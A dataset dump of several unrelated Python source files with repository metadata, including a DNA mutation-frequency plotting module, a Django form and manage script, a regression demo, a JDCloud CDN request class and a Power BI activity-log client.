        mv=mutation_values[i]
        ##NEED TO SET COLOR VALUES HERE
        #Cvalue=[mutation_values[i]*2,1,mutation_values[i]*2]
        # RGB: stronger signal -> darker/redder cell
        Cvalue=[1-norm(mv)*.5, 1-norm(mv)*.95-.05,1-norm(mv)*.95-.05]
        if circle == False:
            ax.add_patch(
                patches.Rectangle(xy, size_rect, size_rect, color=Cvalue)
            )
        else:
            # radius scales with sqrt so AREA is proportional to the value
            try: r=np.sqrt(mutation_values[i]/max_mv)
            except: r=0
            ax.add_patch(
                patches.Circle(xy+.1, size_radius*r , color=Cvalue)
                #RADIUS is proporation to the mutation_value[i], scaled by max_mv ~ allowing the maximum circle to fill
                #a box... the scaler doesn't matter, as it stays constant in a given graph.
            )
        #ax.add_patch(patches.Rectangle(xy, size_rect, size_rect, fill=False, lw=.2))
        if showtxt: #and mv <= 0:
            # percentage label, clamped at 0 so negatives render as 0%
            nump = '{0:.0%}'.format(max(mv,0))
            ax.text(xy[0]+.105,xy[1]+.1, nump ,verticalalignment='center', horizontalalignment='center')
    #ax.get_xaxis().set_visible(False)
    #ax.get_yaxis().set_visible(False)
#########################PLOTTING A TABLE FOR EACH MUTATION RATE
def table_output(Mnormlist, row_labels=[], subtract_zero=False, zero=[], x1=1170, x2=1270, rows=[]):
    # Render a colored table of per-sample mutation-type frequencies (x1e3).
    # NOTE(review): row_labels is accepted but never used; rows is the label
    # source.  The mutable defaults ([]) are never mutated here, so they are
    # harmless, but tuples would be safer.
    #rows = row_labels
    # fallback labels are experiment-specific sample names
    if len(rows)==0: rows = ('wtT7-KO', 'pA154', 'APN1-KO', 'APN2-SHL', 'CIP1-KO', 'REV3-SHL', 'REV7-SHL',
                 '479/82/149int', 'g479', 'g480', 'g481', 'g482', 'g79/80/81', 'g63/66/69', 'wt-ctrl',
                 'wtT7-KO', 'pA152', 'pA153','pA158', 'pA159', 'polK', 'UDGmut', '79/82+148int', '79/82+681', '79/81+716')
    #are we going to execute the zero subtraction?? if so that will be the first matrix Mnormlist[0]
    normalize = subtract_zero
    if subtract_zero: baseline = np.round( mutation_types(zero, x1=x1, x2=x2) * 1E3, 3 )
    #############################################################
    #COMPUTE THE MUTATION TYPE FREQUENCIES and APPEND TO A MATRIX
    MUT = np.zeros((len(Mnormlist), 16))
    for i, norm in enumerate(Mnormlist):
        #calculate mutation types and round to 3rd decimnal place x10E3
        if normalize: MUT[i] = np.round( mutation_types(norm, x1=x1, x2=x2) * 1E3, 3 ) - baseline
        else: MUT[i] = np.round( mutation_types(norm, x1=x1, x2=x2) * 1E3, 3 )
        # clamp negative baseline-subtracted values to zero
        if normalize: MUT[i][MUT[i]<0] = 0
        #
        #print( str(i+1) + ': ' + str(MUT[i]))
    #####################
    #MAKE THE COLUMN PLOT
    # per-column normalization for the cell color map (1E-8 avoids /0)
    normal = MUT/np.max(MUT+1E-8,axis=0)
    fig, axs =plt.subplots(1)
    collabel=("A:A", "A:T", "A:C", "A:G", "T:A", "T:T", "T:C", "T:G", "C:A", "C:T",
              "C:C", "C:G", "G:A", "G:T", "G:C", "G:G")
    rowlabel= [str(i)+": "+rows[i] for i in range(len(MUT))]
    axs.axis('tight')
    axs.axis('off')
    the_table = axs.table(cellText=MUT,colLabels=collabel,rowLabels=rowlabel,
                          loc='center', cellColours=plt.cm.summer(normal))
    the_table.scale(2,1)
    #axs.title("Mutation frequencies for samples x 10^-3")
    #plt.title('Mutation frequencies for samples x 10^-3')
    plt.show()
def CurvesDots(graph1, graph2, name1='0', name2='ctrl', baseStart='A', baseEND='T', window=20, Xrange=[0,1250], machine='none', remove_out=True):
    """DEAD CODE: this definition is immediately shadowed by the second
    `CurvesDots` defined later in this module (which adds `area` and
    `lines` parameters and extra machine presets).  Kept only for history;
    it is never callable after import."""
    #setting the range
    Xrange=Xrange
    #defining the dot area!
    area=.9
    # y-limit presets per sequencing machine, keyed [baseStart][baseEND]
    if machine=='miseq': Ydic={'A':{'T':[1E-6,3E-4], 'C':[1E-6,1E-4], 'G':[1E-6,6E-4]},
           'T':{'A':[1E-6,2E-4], 'C':[1E-6,6E-4], 'G':[1E-6,1E-4]},
           'C':{'A':[1E-6,1E-4], 'T':[1E-5,1E-1], 'G':[1E-6,1E-4]},
           'G':{'A':[1E-6,5E-4], 'T':[1E-6,2E-4], 'C':[1E-6,1E-4]} }
    elif machine=='hiseq': Ydic={'A':{'T':[1E-6,6E-4], 'C':[1E-6,6E-4], 'G':[1E-6,6E-4]},
           'T':{'A':[1E-6,6E-4], 'C':[1E-6,6E-4], 'G':[1E-6,6E-4]},
           'C':{'A':[1E-6,6E-4], 'T':[1E-6,1E-1], 'G':[1E-6,6E-4]},
           'G':{'A':[1E-6,2E-3], 'T':[1E-6,6E-4], 'C':[1E-6,6E-4]} }
    else: Ydic={'A':{'T':[3E-5,1E-3], 'C':[3E-5,2E-3], 'G':[3E-5,1E-3]},
           'T':{'A':[3E-5,1E-3], 'C':[3E-5,6E-4], 'G':[3E-5,2E-3]},
           'C':{'A':[3E-5,2E-3], 'T':[3E-5,1E-1], 'G':[3E-5,5E-4]},
           'G':{'A':[3E-5,2E-3], 'T':[3E-5,1E-3], 'C':[3E-5,6E-4]} }
    #print(baseStart, baseEnd)
    Yrange=Ydic[baseStart][baseEND]
    # C->T is the dominant channel, so it gets a log y-axis
    if baseStart=='C' and baseEND=='T': graphtype='log'
    else: graphtype='linear'
    ##############################################3
    lookup={'A':0,'T':1,'C':2,'G':3} #dictionar for bases
    MT=graph1 #pick out which data file to use
    x_T=MT[lookup[baseStart]]>.51 #
    #plt.scatter(range(len(MT.T)), 1-np.max(MT.T[:,:],axis=1), s=area*2, color='green')
    plt.scatter(np.arange(-window, -window+len(MT.T)), MT.T[:,lookup[baseEND]]*x_T, s=area*3, color='blue')
    plt.scatter(np.arange(-window, -window+len(graph2.T)), graph2.T[:,lookup[baseEND]]*x_T[:len(graph2.T)], s=area*3, color='orange')
    plot_NtoN([graph1],baseStart=baseStart,baseEnd=baseEND,N=window,log=True,
              lims=False, ASScolor=True, colors=['blue', 'blue'], linewidth=2.3, remove_out= remove_out)
    plot_NtoN([graph2],baseStart=baseStart,baseEnd=baseEND,N=window,log=True,
              lims=False, ASScolor=True, colors=['orange', 'orange'], linewidth=2.3, remove_out= remove_out)
    plt.ylim(Yrange)
    plt.xlim(Xrange)
    plt.title(name1 + ' // ' + name2 + ' : ' + baseStart + ' -> ' + baseEND)
    #plt.yscale('log')
    plt.yscale(graphtype)
    return plt
def CurvesDots(graph1, graph2, name1='0', name2='ctrl', baseStart='A', baseEND='T', window=20, Xrange=[0,1250], machine='none', remove_out=True, area=.9, lines=True):
    """Overlay per-position baseStart->baseEND substitution dots for two
    samples (blue = graph1, orange = graph2), optionally with smoothed
    curves from plot_NtoN.

    graph1/graph2 are normalized base-call matrices (rows A,T,C,G).
    `machine` selects preset y-axis limits; the C->T panel uses a log
    y-scale.  Returns the matplotlib.pyplot module for chaining.
    """
    #setting the range
    Xrange=Xrange
    #defining the dot area!
    area=area
    # y-limit presets per sequencing machine, keyed [baseStart][baseEND]
    if machine=='miseqALT': Ydic={'A':{'T':[1E-6,3E-4], 'C':[1E-6,1E-4], 'G':[1E-6,3E-4]},
           'T':{'A':[1E-6,2E-4], 'C':[1E-6,4E-4], 'G':[1E-6,1E-4]},
           'C':{'A':[1E-6,1E-4], 'T':[1E-5,1E-1], 'G':[1E-6,1E-4]},
           'G':{'A':[1E-6,7E-4], 'T':[1E-6,2E-4], 'C':[1E-6,1E-4]} }
    # BUGFIX: this branch was `if`, not `elif`, so machine='miseqALT' fell
    # through to the trailing `else` and its presets were overwritten.
    elif machine=='miseq': Ydic={'A':{'T':[1E-6,3E-4], 'C':[1E-6,1E-4], 'G':[1E-6,6E-4]},
           'T':{'A':[1E-6,2E-4], 'C':[1E-6,6E-4], 'G':[1E-6,1E-4]},
           'C':{'A':[1E-6,1E-4], 'T':[1E-5,1E-1], 'G':[1E-6,1E-4]},
           'G':{'A':[1E-6,5E-4], 'T':[1E-6,2E-4], 'C':[1E-6,1E-4]} }
    elif machine=='hiseq': Ydic={'A':{'T':[1E-6,6E-4], 'C':[1E-6,6E-4], 'G':[1E-6,6E-4]},
           'T':{'A':[1E-6,6E-4], 'C':[1E-6,6E-4], 'G':[1E-6,6E-4]},
           'C':{'A':[1E-6,6E-4], 'T':[1E-6,1E-1], 'G':[1E-6,6E-4]},
           'G':{'A':[1E-6,2E-3], 'T':[1E-6,6E-4], 'C':[1E-6,6E-4]} }
    elif machine=='dots': Ydic={'A':{'T':[.5E-6,5E-4], 'C':[.5E-6,5E-4], 'G':[.5E-6,5E-4]},
           'T':{'A':[.5E-6,5E-4], 'C':[.5E-6,5E-4], 'G':[.5E-6,5E-4]},
           'C':{'A':[.5E-6,5E-4], 'T':[.5E-6,1E-1], 'G':[.5E-6,5E-4]},
           'G':{'A':[.5E-6,2E-3], 'T':[.5E-6,5E-4], 'C':[.5E-6,5E-4]} }
    else: Ydic={'A':{'T':[3E-5,1E-3], 'C':[3E-5,2E-3], 'G':[3E-5,1E-3]},
           'T':{'A':[3E-5,1E-3], 'C':[3E-5,6E-4], 'G':[3E-5,2E-3]},
           'C':{'A':[3E-5,2E-3], 'T':[3E-5,1E-1], 'G':[3E-5,5E-4]},
           'G':{'A':[3E-5,2E-3], 'T':[3E-5,1E-3], 'C':[3E-5,6E-4]} }
    Yrange=Ydic[baseStart][baseEND]
    # C->T is the dominant channel, so it gets a log y-axis
    if baseStart=='C' and baseEND=='T': graphtype='log'
    else: graphtype='linear'
    lookup={'A':0,'T':1,'C':2,'G':3} #dictionary for bases
    MT=graph1 #pick out which data file to use
    # positions where baseStart is the dominant identity call
    x_T=MT[lookup[baseStart]]>.51
    plt.scatter(np.arange(-window, -window+len(MT.T)), MT.T[:,lookup[baseEND]]*x_T, s=area*3, color='blue')
    plt.scatter(np.arange(-window, -window+len(graph2.T)), graph2.T[:,lookup[baseEND]]*x_T[:len(graph2.T)], s=area*3, color='orange')
    if lines: plot_NtoN([graph1],baseStart=baseStart,baseEnd=baseEND,N=window,log=True,
              lims=False, ASScolor=True, colors=['blue', 'blue'], linewidth=2.3, remove_out= remove_out)
    if lines: plot_NtoN([graph2],baseStart=baseStart,baseEnd=baseEND,N=window,log=True,
              lims=False, ASScolor=True, colors=['orange', 'orange'], linewidth=2.3, remove_out= remove_out)
    plt.ylim(Yrange)
    plt.xlim(Xrange)
    plt.title(name1 + ' // ' + name2 + ' : ' + baseStart + ' -> ' + baseEND)
    plt.yscale(graphtype)
    return plt
def return_index(M, letter='A'):
    """Boolean mask of columns where `letter`'s row of M exceeds 0.8."""
    row = {'A': 0, 'T': 1, 'C': 2, 'G': 3}[letter]
    return M[row, :] > .8
def add_means(means, stdevs):
    """Sum independent means and propagate their standard deviations.

    :param means: per-component means
    :param stdevs: per-component standard deviations
    :return: (sum of means, sqrt of the sum of variances)
    """
    mean = np.sum(means)
    # BUGFIX: exponent was 1/len(means), which equals the correct square
    # root only for exactly two components; standard error propagation for
    # a sum is sqrt(sum(std_i**2)) regardless of component count.
    # np.asarray also lets plain Python lists be passed for stdevs.
    std = np.sqrt(np.sum(np.asarray(stdevs) ** 2))
    return mean, std
def divide_means(mean1, mean2, std1, std2):
    """Elementwise ratio mean1/mean2 with propagated standard deviation.

    Zeros in either mean are replaced by 1e-6 to avoid division by zero;
    inputs are copied (np.array), so the caller's arrays are untouched.
    """
    numer = np.array(mean1)
    denom = np.array(mean2)
    numer[numer == 0] = 1E-6
    denom[denom == 0] = 1E-6
    ratio = numer / denom
    # relative errors add in quadrature for a quotient
    rel_err = np.sqrt((std1 / numer) ** 2 + (std2 / denom) ** 2)
    return ratio, ratio * rel_err
def average_means(means, stdevs):
    """Average replicate means; return (mean, sample standard deviation).

    With fewer than two replicates the single (mean, std) pair is passed
    through unchanged; otherwise the input stdevs are ignored and the
    spread between replicates is used instead.
    """
    if len(means) < 2:
        return means[0], stdevs[0]
    center = np.average(means)
    spread = np.sqrt(np.sum((means - center) ** 2) / (len(means) - 1.0))
    return center, spread
def ATCG_values(MnormA1, MnormA2, MnormB1, MnormB2, Xstart=800, Xend=1100, naming=''):
    """DEAD CODE: shadowed by the second `ATCG_values` defined later in this
    module (vertical-bar variant returning 3 values instead of 5); this
    horizontal-bar version is never callable after import.
    NOTE(review): `y[[lookup[i]]]` uses doubled brackets — looks like a typo
    for `y[lookup[i]]` (also present in the live copy)."""
    #pull out mutation type information for replicate samples A1, 2 and B1, 2
    m1, m2 = mutation_types(MnormA1, x1=Xstart, x2=Xend), mutation_types(MnormA2, x1=Xstart, x2=Xend)
    m3, m4 = mutation_types(MnormB1, x1=Xstart, x2=Xend), mutation_types(MnormB2, x1=Xstart, x2=Xend)
    #generate and average and STDEV for the 2 replicates
    x1, y1 = np.average([m1, m2], axis=0), np.std([m1, m2], axis=0)
    x2, y2 = np.average([m3, m4], axis=0), np.std([m3, m4], axis=0)
    #divide the means to find a ratio of increase and error-prop standard deviations
    x, y = divide_means(x2, x1, y2, y1)
    #print(x)
    #average means (A->N [1,2,3]) (T->N [4,6,7]) (C->N [8,9,11]) (C->T [9]) (C->!T [8, 11]) (G->N [12,13,14])
    lookup = {"A->N":[1,2,3], "T->N":[4,6,7], "C->!T":[8,11], "C->T":[9], "G->N":[12,13,14]}
    values, means, stds = {}, [], []
    for i in ["A->N", "T->N", "C->!T", "C->T", "G->N"]:
        z = average_means(x[lookup[i]], y[[lookup[i]]])
        means.append(z[0])
        stds.append(z[1])
        values[i] = z
    plt.barh(range(len(means))[::-1], means, .5, alpha=1, color='grey',
             xerr=stds, error_kw={'ecolor': '0.0'}, label='testing',log=True)
    plt.xlim([.1,100])
    plt.axvline(x=1, color='black', linestyle='--')
    plt.yticks(range(len(means))[::-1], ["A->N", "T->N", "C->!T", "C->T", "G->N"])
    plt.xlabel('fold increase in substitution rate +pT7/-pT7')
    plt.ylabel('substitution types')
    plt.title('ratio of subs rates +/-pT7 / 2-replicate / bp' + str(Xstart) + '-' + str(Xend) + '/' + naming)
    return values, means, stds, x, y
def runATCG(M1, M2, N1, N2, window=10, Xrange=[0,1250], savefig=False, machine='hiseq', remove_out=True, area=.9, lines=True):
    """Draw the 4x4 grid of substitution CurvesDots panels for two samples.

    Rows walk the target base in order G,C,T,A and columns the source base
    in order A,T,C,G; the four identity cells are left blank.  Optionally
    saves the figure as a PNG under 20180112_Analysis/.
    """
    plt.figure(figsize=(25, 25))
    cells = [(end, start) for end in 'GCTA' for start in 'ATCG']
    for slot, (end, start) in enumerate(cells, start=1):
        if end == start:
            continue  # identity panel stays empty but keeps its grid slot
        plt.subplot(4, 4, slot)
        CurvesDots(M1, M2, name1=N1, name2=N2,
                   baseStart=start, baseEND=end, window=window, Xrange=Xrange,
                   machine=machine, remove_out=remove_out, area=area, lines=lines)
    if savefig:
        plt.savefig('20180112_Analysis/' + N1 + '__' + N2 + '.png', transparent=False)
def ATCG_values(MnormA1, MnormA2, MnormB1, MnormB2, Xstart=800, Xend=1100, naming=''):
    """Fold-change in substitution rates (B replicates over A replicates).

    Computes 16-channel mutation-type profiles for the two replicate
    pairs, averages each pair, takes the B/A ratio with error
    propagation, groups channels into five substitution classes, and
    bar-plots the fold change on a log axis.

    :return: (values, means, stds) where `values` maps class name ->
        (mean, std) and `means`/`stds` follow the plotting order.
    """
    # per-replicate substitution profiles over the window [Xstart:Xend)
    m1, m2 = mutation_types(MnormA1, x1=Xstart, x2=Xend), mutation_types(MnormA2, x1=Xstart, x2=Xend)
    m3, m4 = mutation_types(MnormB1, x1=Xstart, x2=Xend), mutation_types(MnormB2, x1=Xstart, x2=Xend)
    # average the two replicates of each condition
    x1, y1 = np.average([m1, m2], axis=0), np.std([m1, m2], axis=0)
    x2, y2 = np.average([m3, m4], axis=0), np.std([m3, m4], axis=0)
    # ratio of condition means with propagated standard deviation
    x, y = divide_means(x2, x1, y2, y1)
    # channel indices per substitution class (identity channels excluded)
    lookup = {"A->N":[1,2,3], "T->N":[4,6,7], "C->!T":[8,11], "C->T":[9], "G->N":[12,13,14]}
    values, means, stds = {}, [], []
    for i in ["A->N", "T->N", "C->!T", "C->T", "G->N"]:
        # BUGFIX: was y[[lookup[i]]] (doubled brackets), a 2-D fancy index
        # that yielded a 1-element array instead of a scalar std for the
        # single-channel C->T class.
        z = average_means(x[lookup[i]], y[lookup[i]])
        means.append(z[0])
        stds.append(z[1])
        values[i] = z
    plt.bar(range(len(means)), means, .5, alpha=1, color='grey',
            yerr=stds, error_kw={'ecolor': '0.0'}, label='testing',log=True)
    plt.axhline(y=1, color='black', linestyle='--')
    plt.xticks(range(len(means)), ["A->N", "T->N", "C->!T", "C->T", "G->N"])
    plt.ylabel('fold increase in substitution rate +pT7/-pT7')
    plt.xlabel('substitution types')
    plt.title('ratio of subs rates +/-pT7 / 2-replicate / bp' + str(Xstart) + '-' + str(Xend) + '/' + naming)
    return values, means, stds
| [
"noreply@github.com"
] | noreply@github.com |
ae9576ab2c05cb279b8cf8b8606acc8bc1c87818 | 94e55472e1cb2de6e3b7db7750481c8bc4b8f424 | /thoth/__init__.py | cd47c67a49ca76784db782a89fc2f8bc0a32c234 | [] | no_license | westurner/thoth | 0b90748fee9242a152f1fb00b61c497632a878a4 | c2a77fbb14625cae74efd7e552fba35d780a8a49 | refs/heads/master | 2020-03-07T13:54:54.209727 | 2018-03-31T09:40:01 | 2018-03-31T09:40:01 | 127,513,639 | 1 | 0 | null | 2018-03-31T09:17:06 | 2018-03-31T08:24:18 | C | UTF-8 | Python | false | false | 150 | py | # -*- coding: utf-8 -*-
"""Top-level package for Thoth."""
__author__ = """Simon DeDeo"""
__email__ = 'sdedeo@andrew.cmu.edu'
__version__ = '1.0.0'
| [
"@westurner"
] | @westurner |
b749aa6103ec81a3d2f409926a1267998cdea89e | 96403d1a134df72473e6ffb2bddac02076d7979a | /manage.py | 3a47208faa5eaf9bde95c2aef46d53a7c153a7ed | [] | no_license | rishabhjainj/giftsomeone | 7ce069878410e82d45847adf914aba55735b1c4b | 085e8777cde1bd6dfeb809099a49e576b7e4dcac | refs/heads/main | 2023-04-13T17:05:09.694286 | 2021-04-27T08:09:51 | 2021-04-27T08:09:51 | 336,269,251 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 667 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
    """Entry point: point Django at the project settings and run its CLI."""
    # Fall back to the project settings module unless one is already set.
    os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'giftSomeone.settings')
    try:
        from django.core.management import execute_from_command_line
    except ImportError as exc:
        message = (
            "Couldn't import Django. Are you sure it's installed and "
            "available on your PYTHONPATH environment variable? Did you "
            "forget to activate a virtual environment?"
        )
        raise ImportError(message) from exc
    execute_from_command_line(sys.argv)


if __name__ == '__main__':
    main()
| [
"jrishabh252@gmail.com"
] | jrishabh252@gmail.com |
c81b66919d48cfe9c28afe654a54b9849eb02112 | 8a853e725b8e5be560505c8cbd3f6ef21b68bf42 | /rsqaured.py | 3bddbced2c023d07667fdbea486587e08d082548 | [] | no_license | zz2k16/MachineLearning | 6bc28e0ce9a8b088cb97f7936b9bf207db604a6e | 3ed023cf8a8dcd91649c784b01abd14998b5215b | refs/heads/master | 2021-01-02T09:17:26.646472 | 2017-08-22T22:48:05 | 2017-08-22T22:48:05 | 99,182,427 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,378 | py | # learning more in depth about how to compute linear regression and using r-squared as a performance measure
# generating random but correlated data to explore the model and its features. for fun :)
import numpy as np
from pylab import *
from scipy import stats
import matplotlib.pyplot as plt
# create two sets of random data, one with normal distribution and the other a linear function of it
pagespeed = np.random.normal(3.0,1.0,1000)
# force a linear relationship using page speed
checkoutcart = 100 - (pagespeed + np.random.normal(0, 0.1, 1000) * 3)
# visualise dummy data
# (scatter comes from the `from pylab import *` star-import above)
scatter(pagespeed, checkoutcart)
# plt.show()
# use ordinary least squares to measure the linear relationship with the scipy linear regression method
slope, intercept, r_val, p_val, std_err = stats.linregress(pagespeed, checkoutcart)
r_squared = r_val ** 2
print(r_squared)
# returns 0.916
# (approximately — the data is random, so the exact value varies per run)
# define function to compute slope using stored values of the linear regression model
# or simply the line of best fit, y = mx + b
def predict_slope(x):
    """Evaluate the fitted regression line (module-level slope/intercept) at x."""
    return intercept + slope * x
# compute slope fitted to pagespeed
fit_line = predict_slope(pagespeed)
# visualise linear regression line
plt.scatter(pagespeed, checkoutcart, c='orange')
# super impose line over scatter plot in blue for contrast
plt.plot(pagespeed, fit_line, c='b')
# BUGFIX: title previously read "Least ordinary squares"; the method's
# name is "ordinary least squares" (OLS).
plt.title('Linear regression - ordinary least squares')
plt.show()
| [
"FarrukhMZ@cardiff.ac.uk"
] | FarrukhMZ@cardiff.ac.uk |
d795d34961b9c42afe0703c20a4e6eeb5855f39a | 21b39d50e4df56ea01453001845d1580729af1df | /jdcloud_sdk/services/cdn/apis/SetDomainConfigRequest.py | 1e000f49f2dff6150f0a5cf3e6fc819eb5b40be3 | [
"Apache-2.0"
] | permissive | Tanc009/jdcloud-sdk-python | ef46eac7731aa8a1839b1fc1efd93249b7a977f0 | 8b045c99bc5b73ca7348e950b6f01e03a27982f5 | refs/heads/master | 2021-08-09T14:49:16.177709 | 2021-06-25T02:38:41 | 2021-06-25T02:38:41 | 141,714,695 | 0 | 0 | Apache-2.0 | 2018-07-20T13:21:17 | 2018-07-20T13:21:16 | null | UTF-8 | Python | false | false | 2,404 | py | # coding=utf8
# Copyright 2018 JDCLOUD.COM
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# NOTE: This class is auto generated by the jdcloud code generator program.
from jdcloud_sdk.core.jdcloudrequest import JDCloudRequest
class SetDomainConfigRequest(JDCloudRequest):
    """
    Update a CDN domain's configuration.

    Issues POST /domain/{domain}/config via the JDCloudRequest base class;
    `parameters` is expected to be a SetDomainConfigParameters instance
    supplying the {domain} path variable and the optional body fields.
    """
    def __init__(self, parameters, header=None, version="v1"):
        super(SetDomainConfigRequest, self).__init__(
            '/domain/{domain}/config', 'POST', header, version)
        self.parameters = parameters
class SetDomainConfigParameters(object):
    """Parameter holder for SetDomainConfigRequest.

    `domain` is required; every other field is optional and stays None
    (omitted from the request) unless its setter is called.
    """

    def __init__(self, domain, ):
        """
        :param domain: the CDN domain to configure (required)
        """
        self.domain = domain
        # optional fields, sent only when explicitly set
        for optional in ('httpType', 'backSourceType', 'jumpType',
                         'jcdnTimeAnti', 'hdrCtrl', 'toutiaoHeader'):
            setattr(self, optional, None)

    def setHttpType(self, httpType):
        """
        :param httpType: (Optional) protocol type, 'http' or 'https' only
        """
        self.httpType = httpType

    def setBackSourceType(self, backSourceType):
        """
        :param backSourceType: (Optional) back-to-origin type
        """
        self.backSourceType = backSourceType

    def setJumpType(self, jumpType):
        """
        :param jumpType: (Optional) one of: default, http, https
        """
        self.jumpType = jumpType

    def setJcdnTimeAnti(self, jcdnTimeAnti):
        """
        :param jcdnTimeAnti: (Optional) dash timed-auth (anti-leech) settings
        """
        self.jcdnTimeAnti = jcdnTimeAnti

    def setHdrCtrl(self, hdrCtrl):
        """
        :param hdrCtrl: (Optional) back-to-origin auth header settings
        """
        self.hdrCtrl = hdrCtrl

    def setToutiaoHeader(self, toutiaoHeader):
        """
        :param toutiaoHeader: (Optional) toutiao header settings
        """
        self.toutiaoHeader = toutiaoHeader
| [
"tancong@jd.com"
] | tancong@jd.com |
6b4e9bc8b9a85aae22af3060ef2e2c72a5132795 | 1c4316feb250c309d318031becc8aa6867667637 | /providers/forms.py | db6eaf827b5aae26648ce76ab79a6d4b28af49b6 | [] | no_license | prabhatse/mozio | 625ec5007c12fb8866e55d0c6ed95558abaf3a75 | be8bd99907f7738233a47dd8e5d48647addc7137 | refs/heads/master | 2021-01-17T21:09:21.996784 | 2016-06-12T12:01:56 | 2016-06-12T12:01:56 | 60,958,579 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,112 | py | from django import forms
from api.provider.models import Providers as Provider
class AddProviderForm(forms.Form):
    """
    Form to save/edit a Provider.

    All fields are optional at the form level; `save` fetches the Provider
    row matching all five submitted values, creating it if absent.
    """
    name = forms.CharField(label='Provider Name', required=False)
    email = forms.EmailField(label='Provider Email', required=False)
    phone_no = forms.CharField(label='Provider Phone', required=False)
    language = forms.CharField(label='Provider Language', required=False)
    currency = forms.CharField(label='Provider Currency', required=False)

    def save(self, force_insert=False, force_update=False, commit=True):
        """Fetch-or-create the Provider described by the submitted data."""
        # NOTE(review): reads self.data (raw submitted values) rather than
        # cleaned_data — presumably the view calls is_valid() first; confirm.
        lookup = dict(name=self.data['name'],
                      email=self.data['email'],
                      phone_no=self.data['phone_no'],
                      language=self.data['language'],
                      currency=self.data['currency'])
        # BUGFIX: was a bare `except:` that swallowed every error (database
        # failures included) and silently created a new row; only "no such
        # row" should trigger creation.
        try:
            obj = Provider.objects.get(**lookup)
        except Provider.DoesNotExist:
            obj = Provider(**lookup)
        obj.save()
| [
"p.shankar@advanskills.com"
] | p.shankar@advanskills.com |
12a3f1bf28c350a16b9e340deebf644633c7a90f | 64b874ae249fe9ed72a087cef59d7dd0efd9bf43 | /pypowerbi/activity_logs.py | fc39a1d56f150cd711f4a87b376edac3c7885097 | [
"MIT"
] | permissive | g-sun/pypowerbi | 9b55e48364c4615cae13be007d64323e6690e0a9 | c7acf7d4c63579fc1824c25f34a37c5f5ce68788 | refs/heads/master | 2023-06-25T10:47:00.496796 | 2021-07-27T02:13:24 | 2021-07-27T02:13:24 | 371,371,591 | 0 | 0 | MIT | 2021-05-27T12:49:41 | 2021-05-27T12:49:40 | null | UTF-8 | Python | false | false | 4,961 | py | # -*- coding: future_fstrings -*-
import requests
import datetime
from requests.exceptions import HTTPError
class ActivityLogs:
    """Accessor for the Power BI admin activity-log REST endpoint."""

    def __init__(self, client):
        """Bind to an authenticated Power BI client and precompute URL parts."""
        self.client = client
        self.base_url = f'{self.client.api_url}/{self.client.api_version_snippet}/{self.client.api_myorg_snippet}'
        self.activities_events_snippet = "activityevents"
        # This is always admin. Not really a group, but follows the
        # format of the rest of the library code
        self.group_part = "admin"

    def get_activity_logs(self, st, et=None, filter=None):
        """
        Gets the activity log for the specified date or date range. If et is None, it will get all logs (from midnight
        to 11:59:59 UTC) for the date specified by st. If et is set, it will retrieve logs from st-et. Note that the
        Power BI Activity Service currently supports only retrieving one day of logs at a time.

        "filter" is a string parameter that's sent to the service to filter the types of events returned. For example,
        "Activity eq 'viewreport' and UserId eq 'john@contoso.com'" gets report views for john(contoso.com).
        Right now the service only supports the operators ['eq', 'and'].

        NOTE: This API allows at most 200 Requests per hour.

        :param st: start date/datetime (python datetime)
        :param et: end datetime (python datetime), or None for the whole day of st
        :param filter: OData-style filter string (shadows the builtin `filter`;
            name kept for backward compatibility with existing callers)
        :return: list of activity-event dicts with "CreationTime" parsed to an
            aware UTC datetime
        """
        if et is None:
            # whole-day query: midnight to 23:59:59 UTC on st's date
            dt_str = st.strftime("%Y-%m-%d")
            st_dt_str = f"{dt_str}T00:00:00"
            et_dt_str = f"{dt_str}T23:59:59"
        else:
            # BUGFIX: format was "%Y-%m-%dT:%H%M%S" (stray colon after 'T',
            # none inside the time), producing malformed timestamps; the
            # service expects ISO-8601.
            st_dt_str = st.strftime("%Y-%m-%dT%H:%M:%S")
            et_dt_str = et.strftime("%Y-%m-%dT%H:%M:%S")

        # form the url
        filter_snippet = f"startDateTime='{st_dt_str}'&endDateTime='{et_dt_str}'"
        url = f'{self.base_url}/{self.group_part}/{self.activities_events_snippet}?{filter_snippet}'
        if filter is not None:
            # BUGFIX: the '&' query-string separator before $filter was missing.
            url += f"&$filter={filter}"

        # form the headers
        headers = self.client.auth_header

        # get the response
        response = requests.get(url, headers=headers)

        # 200 is the only successful code, raise an exception on any other response code
        if response.status_code != 200:
            # BUGFIX: message previously said "Get Datasets" (copy/paste).
            raise HTTPError(response, f'Get Activity Logs request returned http error: {response.json()}')

        response_obj = response.json()
        event_entities = response_obj["activityEventEntities"]
        continuation_uri = response_obj["continuationUri"]
        continuation_token = response_obj["continuationToken"]
        activity_events = event_entities

        # The service pages results: keep following the continuation URI until
        # no continuation token is returned (Microsoft's documented pattern;
        # many of the intermediate pages are empty).
        while continuation_token is not None:
            response = requests.get(continuation_uri, headers=headers)
            response_obj = response.json()
            event_entities = response_obj["activityEventEntities"]
            continuation_uri = response_obj["continuationUri"]
            continuation_token = response_obj["continuationToken"]
            activity_events.extend(event_entities)

        # Convert "CreationTime" strings to timezone-aware UTC datetimes.
        _date_fmt_str = '%Y-%m-%dT%H:%M:%S'
        for event in activity_events:
            event["CreationTime"] = datetime.datetime.strptime(event["CreationTime"], _date_fmt_str)
            event["CreationTime"] = event["CreationTime"].replace(tzinfo=datetime.timezone.utc)

        return activity_events
| [
"adahlin@mckinleycapital.com"
] | adahlin@mckinleycapital.com |
